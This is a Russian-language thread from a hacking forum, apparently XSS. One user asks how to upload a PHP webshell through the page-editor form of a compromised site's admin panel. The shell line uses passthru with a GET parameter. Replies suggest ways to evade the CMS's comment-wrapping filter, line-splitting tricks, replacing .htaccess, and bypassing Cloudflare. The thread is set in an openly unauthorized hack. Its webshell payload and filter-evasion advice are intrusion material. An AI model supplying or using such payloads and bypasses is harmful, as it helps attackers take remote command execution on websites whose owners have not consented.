• XSS.stack #1 – первый литературный журнал от юзеров форума

дайте совет по заливке вебшелла

Fine

(L3) cache
Пользователь
Регистрация
25.06.2022
Сообщения
283
Реакции
110
Гарант сделки
3
Депозит
0.04 Ł
Всем привет. При хаке столкнулся с проблемой. Есть админка, я хочу попробовать залить вебшелл через формы создания страниц на сайте.
пытался залить обычный мини шелл - на выходе получаю такое в исходниках - <p><!--?php echo passthru($_GET['cmd']); ?--></p>
Я так понимаю это защита, но я не могу нагуглить можно ли как то это обойти вообще. Потому прошу совета.
Подскажите пожалуйста.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ну он твой блок оборачивает в коментарий судя по всему
попробуй чет типо этого хз
<< -->?php echo passthru($_GET['cmd']); <!-->>
Знать бы на самом деле патерн/регулярку по которой она это делает, можно было бы подумать, попробуй код на строки разбить
 
Последнее редактирование:
Всем привет. При хаке столкнулся с проблемой. Есть админка, я хочу попробовать залить вебшелл через формы создания страниц на сайте.
пытался залить обычный мини шелл - на выходе получаю такое в исходниках - <p><!--?php echo passthru($_GET['cmd']); ?--></p>
Я так понимаю это защита, но я не могу нагуглить можно ли как то это обойти вообще. Потому прошу совета.
Подскажите пожалуйста.
Есть предположение, что все знают, что это за сайт ))))
 
Есть предположение, что все знают, что это за сайт ))))
Нихуя ты детектив:)
Такая проблема далеко не на одном сайте встретилась. Эта панелька почти везде есть где есть возможность редачить html напрямую для страниц на сайте.
Сейчас задался вопросом потому что есть пара-тройка панелей где не получается залить вебшелл через картинку, потому пробую другие пути.
 
Есть предположение, что все знают, что это за сайт ))))
А если как то рили совпало - то вообще похуй:)
 
Ну он твой блок оборачивает в коментарий судя по всему
попробуй чет типо этого хз
<< -->?php echo passthru($_GET['cmd']); <!-->>
Знать бы на самом деле патерн/регулярку по которой она это делает, можно было бы подумать, попробуй код на строки разбить
Я по разному пробовал и так как ты показал, в том числе:(
Насчет регулярки - ну <> энкодит в &lt; типо такого и комментит есть есть <? И ?>
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Я по разному пробовал и так как ты показал, в том числе:(
Насчет регулярки - ну <> энкодит в &lt; типо такого и комментит есть есть <? И ?>
а пробовал
<
?
как то так?
 
а пробовал
<
?
как то так?
Да, он не понимает что это скрипт, добавляет <p> и выводит это как текст.
 
Сталкивался с такой же проблемой, байпаснуть не смог. У меня есть 2 предположения.
1. apache/nginx фильтруют <?php ?> последовательности в файлах не подходящего разрешения (.html, .txt etc...) но позволяют запускать .php/.php6/.phtml
2. apache/nginx не настроены на запуск .php файлов в директории куда файл записывается
 
Всем привет. При хаке столкнулся с проблемой. Есть админка, я хочу попробовать залить вебшелл через формы создания страниц на сайте.
пытался залить обычный мини шелл - на выходе получаю такое в исходниках - <p><!--?php echo passthru($_GET['cmd']); ?--></p>
Я так понимаю это защита, но я не могу нагуглить можно ли как то это обойти вообще. Потому прошу совета.
Подскажите пожалуйста.
Я предлагаю тебе пройти банальную лабу на портсвигере File Upload , там как раз таки и поясняют за подобные байпассы.
Как раз таки будешь уже +- ловить понимание как и что делать в той или иной ситуации.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
если вы .htaccess заблокировали вашу загрузку, вам нужно удалить .htaccess или повторно загрузить другой обходной путь .htaccess, если у вас сервер Cloudflare, вам нужен хороший скрипт для обхода безопасности загрузки
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх